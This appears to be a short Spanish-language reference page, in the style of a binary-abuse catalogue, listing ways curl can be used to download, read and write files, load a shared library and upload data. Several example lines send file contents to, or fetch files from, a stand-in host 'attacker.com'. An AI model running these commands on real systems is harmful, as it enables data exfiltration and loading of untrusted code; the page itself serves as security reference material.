./curl --examples
Funciones y ejemplos de uso
download
curl http://attacker.com/path/to/input-file -o /path/to/output-file
file-read
curl file:///path/to/input-file
file-write
echo DATA >/path/to/temp-file
curl file:///path/to/temp-file -o /path/to/output-file
library-load
curl --engine /path/to/lib.so x
upload
curl -X POST --data-binary @/path/to/input-file http://attacker.com
curl -X POST --data-binary DATA http://attacker.com
curl gopher://attacker.com:12345/_DATA
./related --binary=curl
Binarios relacionados
Comparten al menos una función con curl.